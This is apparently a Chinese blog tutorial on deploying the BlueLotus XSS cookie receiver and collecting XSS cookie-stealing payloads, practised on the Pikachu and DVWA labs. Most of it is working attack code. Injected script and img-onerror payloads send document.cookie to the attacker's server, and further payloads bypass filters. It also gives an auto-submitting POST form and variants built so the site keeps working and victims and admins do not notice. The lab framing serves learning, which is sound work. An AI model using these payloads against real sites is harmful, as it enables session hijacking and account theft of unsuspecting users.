简单xss接收cookie平台的搭建以及xss拿cookie的一些总结
接收平台的搭建_BlueLotus_XSSReceiver
这个是搭建教程:
打Cookie小工具_BlueLotus_XSSReceiver
链接:百度网盘 请输入提取码 提取码: tdoj
我是将其搭在服务器上,模拟最真实的攻击环境。搭在服务器上需要几个条件,一是得有apache服务,二是得有php环境。
Linux环境搭建:CentOs + Apache + MySQL + PHP - 云+社区 - 腾讯云
下面说一下在搭建过程中踩的坑。
一、在上传的时候直接上传解压好的_BlueLotus_XSSReceiver,我发现会少了三个文件,问了一下学长,可以直接上传压缩包到/var/www/html目录下,然后通过命令解压。
unzip xxx.zip
二、在配置提交的时候,它提示xss储存路径没有写的权限.......
得在服务器上/var/www/html/BlueLotus_XSSReceiver下赋予data、template、myjs文件夹写的权限
命令为:
chmod 777 data
配置完上面三个文件夹,你会发现它又提示,根目录没有写的权限,这时候得先返回上一级目录,即到/var/www/html
命令为:
#返回到/var/www/html
cd ../
#然后赋予根目录写的权限
chmod 777 BlueLotus_XSSReceiver
三、搭好平台,在准备测试的时候,先要建立好js文件,步骤如下:
接着选择js模块为defalut,选择插入模板
对于存储型而言,生成的payload直接插入存在xss的地方
结合皮卡丘和dvwa靶场对xss攻击的一些总结
get反射型xss、存储型xss
存储型xss危害更大,一般直接在留言板这类地方输入xss恶意代码即可。反射型的xss得诱导受害者点击精心准备的恶意链接,下面放张图片更容易理解。
一、无过滤的情况,直接用搭建好的平台生成的payload打
<script src="http://服务器ip/BlueLotus_XSSReceiver/myjs/dvwa_xss.js"></script>
二、过滤将<script>变为空的情况,如$name = str_replace( '<script>', '', $_GET[ 'name' ] );
可以采取双写绕过或者大小写绕过的方式。
<script src="http://服务器ip/BlueLotus_XSSReceiver/myjs/dvwa_xss.js"></scr<script>ipt>
or
<script src="http://服务器ip/BlueLotus_XSSReceiver/myjs/dvwa_xss.js"></SCript>
三、直接ban死<script>的情况,如$name = preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $_GET[ 'name' ] );
这时候可以换个标签<img>、<iframe>标签,<iframe>配合onerror是成功不了的,应该是<iframe>标签加载出了文档,页面当成没发生错误吧。
其实我们搭建的平台本质是利用<script>src="url"</script>加载生成好的js文件,通过js文件获取cookie等内容然后以受害者的身份发送get请求,然后平台接收请求并整理get请求中的cookie等信息。下面的payload是直接向我们的xss接收平台发送请求,因为没有<script>了,不能直接加载js文件。
<iframe src=1 οnlοad=document.location='http://服务器ip/BlueLotus_XSSReceiver?cookie='+document.cookie+'&location='+ducoment.location.href>
<img src=1 οnerrοr=document.location='http://服务器ip/BlueLotus_XSSReceiver?cookie='+document.cookie;>
上面两个payload的缺点是会发生跳转,因为里面有个document.location。现象一下,一个网站存在储存型xss,过滤死了<script>,你用上面两种payload打。每个用户进入存在xss的界面就会发送cookie,并发生跳转,导致网站不能正常工作。这时候肯定有人向管理员反馈,然后修复漏洞,寄了。
那也没有一种payload可以不知不觉发送cookie,同时网站也可以正常工作的呢?有,神技。第一个是创造一个img方法配合src的使用可以发送cookie。第二种是创造一个script,把创造出来的script加入到body子节点,最后调用xss平台生成的js文件,js文件向平台发送cookie。
<img src=1 οnerrοr=img=document.createElement('img');img.src='http://服务器ip/BlueLotus_XSSReceiver?cookie='+document.cookie>
<img src=x οnerrοr=s=createElement('script');body.appendChild(s);s.src='http://服务器ip/BlueLotus_XSSReceiver/myjs/dvwa_xss.js';>
论坛xss利用打到cookie- Track 知识社区 - 掌控安全在线教育 - Powered by 掌控者
XSS漏洞 - JavaShuo
像这种<img src='http://服务器ip/BlueLotus_XSSReceiver?cookie=' +document.cookie;>的payload,我试了几次,没成功。
感觉好像是不会把document.cookie算入src的加载内容中,在接收平台虽然收到了请求,但是得不到cookie的值
而上面的第一个payload则是把document.cookie算进去了
post反射型xss、存储型xss
post的话感觉也是差不多的,只是需要另外做一个恶意站点,里面有个post表单,用户一访问这个站点,就会自动以post的方式提交xss代码。这个可以在服务器index.php上写,当用户访问服务器ip的时候,会自动提交这个表单。
<html>
<head>
<script>
window.onload = function() {
document.getElementById("postsubmit").click();
}
</script>
</head>
<body>
<form method="post" action="http://192.168.1.3/pikachu-master/vul/xss/xsspost/xss_reflected_post.php">
<input id="xssr_in" type="text" name="message" value=
"<script> src="http://服务器ip/BlueLotus_XSSReceiver/myjs/dvwa_xss.js">
</script>"
/>
<input id="postsubmit" type="submit" name="submit" value="submit" />
</form>
</body>
</html>
DOM型xss
和前两种xss的区别,简单地说DOM型xss表现在前端,不与后台服务器交互,只是通过浏览器的DOM树解析产生。
皮卡丘靶场和dvwa靶机DOM型xss采取不同方式的分析
dvwa靶场DOM型xss
LOW等级直接打。
Medium等级看到源码过滤死了<script,那换成其它的
如:<img src=1 οnerrοr=alert(11)>
可以看到我们的payload插入到value值里面,但是并没有插入到<option>标签中。
正常输入一个东西是会插入到value值,也会插入到<option>标签里面的。
所以我们得尝试一下闭合前面的标签,即闭合<option>和<select>标签,修改一下发现成功了。
所以这种要拿cookie的话直接利用上面反射型xss第三类方法打就行了。
payload:
</option></select><img src=1 οnerrοr=alert(11)>
High等级使用了白名单,只允许French,English,German以及Spanish这几个值,那这种情况可以采用注释的方式。
因为URL中#号之后的内容,在提交表单时,被当成注释,不会被提交到服务器。而在在浏览器解析时,会解析,从而实现xss。
payload:
#<script>alert(11)</script>
或者
#</option></select><img src=1 οnerrοr=alert(11)>
皮卡丘靶场DOM型xss:
直接尝试<script>alert(11)</script>后发现在href属性里面,直接点击what do you see看到是会跳转的,造成不了xss。
查看源代码,搜索what do快速找到该区域,发现它的写入方法。
我们把它单独拿出来,构造闭合,这样子是为了让我们的标签独立出来执行。直接的"+str+"是我们可控的,想一想办法,像下面这样子就可以弹窗了。
这种类型感觉有点鸡肋,要获取cookie只能让受害者自己在输入框输入payload发送他的cookie到我们的平台上.......em......有点无语。
皮卡丘靶场DOM-X型xss
这种类型和上一种不同在于这个是通过get传值,危害性更大,攻击者可以通过让用户点击不明链接获得cookie。
做这种的时候还是得先通过源代码搜索看一下是不是要闭合,这题和上一题的闭合方式一样,想获取cookie可以通过让受害者点击不明链接,这两个dom型除了<script src='js文件地址'></script>这种用不了,其它好像都可以用。
皮卡丘靶场的xss盲打
这个直接用我们不会发生跳转的payload打cookie就好了。
皮卡丘靶场的xss之js输出
随便输入111,看一下它是什么形式。发现在<script>标签里面是'111',这种可以直接构造闭合。
用'</script>形成闭合,然后可以随意执行了。
payload:
'</script><script>alert(11)</script>
打cookie的话也是通过诱导受害者点击不明链接,你发现这个是get传值的。
皮卡丘靶场的xss之href输出和htmlspecialchars
这两个都是经过了htmlspecialchars过滤,只剩下单引号。
可用的方法
ENT_COMPAT -默认。仅编码双引号。
ENT_QUQTES -编码双引号和单引号
ENT_NOQUOTES -不编码任何引号
被转换的预定义的字符有:
&:转换为&
":转换为"
':转换为成为 '
<:转换为<
>:转换为>
输入特殊字符' " < > ,查看前端源码,我们看到 " < > 都进行了html实体转码
payload:
javascript:alert(11)
' οnclick='alert(11)
可能有点师傅疑惑为什么这里不能闭合标签,这是因为htmlspecialchars过滤了。看一下源码,发现输入的东西经过过滤后直接输出到href里面了。
对于这种修复的建议是在输入的值那里加点过滤,只允许http或者https开头的值输入。这种怎么打cookie我也是没想到。至于dvwa靶场里面的impossible等级里面也是 htmlspecialchars过滤,为什么它那里不能弹窗?这个原因是因为它输出的值到<pre>标签里面。
标签的选择
最后面放个github的标签合集,在某些情况下,可以把它们一次改成alert(1)、alert(2)进行爆破,看看哪个标签可以用。
https://github.com/thatqier/MyPayloads/blob/master/xss/xss_intruder.txt
严格过滤的情况
下面放几个绕过技术的文件。
百度网盘 请输入提取码
提取码:qaza
简单xss接收cookie平台的搭建以及xss拿cookie的一些总结相关推荐
- linux搭建xss平台,一个漏洞平台的搭建
最近刚入门web安全,学习了很多漏洞以及攻击手法.但是苦于没有地方练手,无意中看到学弟的一篇文章,一个名为BWVS的漏洞平台的搭建,据说这个平台包含很多漏洞,是居家旅行.练手必备的神器啊,于是乎我便开 ...
- 从零开始,搭建一个简单的UVM验证平台(一)
前言: 这篇系列将从0开始搭建一个UVM验证平台,来帮助一些学习了SV和UVM知识,但对搭建完整的验证环境没有概念的朋友. UVM前置基础: 1.UVM基础-factory机制.phase机制 2.U ...
- Symbian开发平台的搭建之VC++6.0Carbide C++ 2.0
Symbian开发平台的搭建之VC++6.0 来源:http://hi.baidu.com/mrico/blog/item/d518f6ea3f0e5dd2d439c90b.html 开始学习Symb ...
- yii2项目实战-博客管理平台的搭建
登录 | 注册 收藏成功 确定 收藏失败,请重新收藏 确定 查看所有私信查看所有通知 暂没有新通知 返回通知列表 下一条 上一条 分享资讯 传PPT/文档 提问题 写博客 传资源 创建项目 创建代码片 ...
- 本地直播平台的搭建—四种方式
本地直播平台的搭建 方法一:Windows下用FFmpeg+nginx+rtmp搭建直播环境 实现推流.拉流 (`测试通过`) 环境 1. 简介: 2. 准备文件 3. 启动nginx服务器 4. 配 ...
- DVWA——XSS(Reflected)——多种方法实现+详细步骤图解+获取cookie的利用过程演示
一)XSS(Reflected)介绍: 反射型xss(非持久型):需要欺骗用户自己去点击链接才能触发XSS代码(服务器中没有这样的页面和内容),一般容易出现在搜索页面.特点:弹窗警告.广告:javas ...
- 本地直播平台的搭建—四种方式(转载)
本地直播平台的搭建-四种方式 转载:https://blog.csdn.net/weixin_41010198/article/details/84141512#WindowsFFmpegnginxr ...
- 高通Android智能平台环境搭建_编译流程分析
高通Android智能平台环境搭建_编译流程分析 高通平台环境搭建,编译,系统引导流程分析 TOC \o \h \z \u 1. 高通平台android开发总结. 7 1.1 搭建高通平台环境开发环境 ...
- 互联网安全架构平台设计之预防XSS攻击
互联网安全架构平台设计之预防XSS攻击 文章目录 互联网安全架构平台设计之预防XSS攻击 一.什么是XSS攻击? 二.XSS攻击详解 1.XSS攻击的原理 2.解决方案 三.注意事项 一.什么是XSS ...
最新文章
- 写给新手的WebAPI实践
- java 为文件及文件夹添加权限
- 三菱modbusRTU通讯实例_实例 | 三菱PLC接线图干货,FX5U模块硬件
- 用python做频数分析_使用Python进行描述性统计
- Cassandra安装和初次使用
- oracle10g debian,Debian Sarge 上安装 Oracle 10g
- 手把手教你用psp手动制作背景透明的图片
- c语言怎么写最小公倍数的函数,C语言 · 最小公倍数
- 【webpack】windows10 局部安装webpack,配置环境变量
- 计算机电脑为什么0无法输入,电脑浏览器网页无法输入文字该怎么办?
- apt gives “Unstable CLI Interface” warning
- 坐标转换 | EXCEL中WGS84转GCJ02,并在地图上标注
- 微信域名防封、域名检测接口api、域名跳转技术、360防拦截揭秘(三)------2020新域名防封技术解析
- js 苹果手机点击事件 兼容
- 解决Ubuntu系统下启动root账户后Linux版本edge浏览器无法启动
- YOLACT实时实例分割
- 安可与普通测评的区别_等级保护、风险评估和安全测评三者之间的区别与联系...
- i技术会 | 如何用AI挖掘和生成视频广告点位
- SringCloud
- SQL注入原理及防范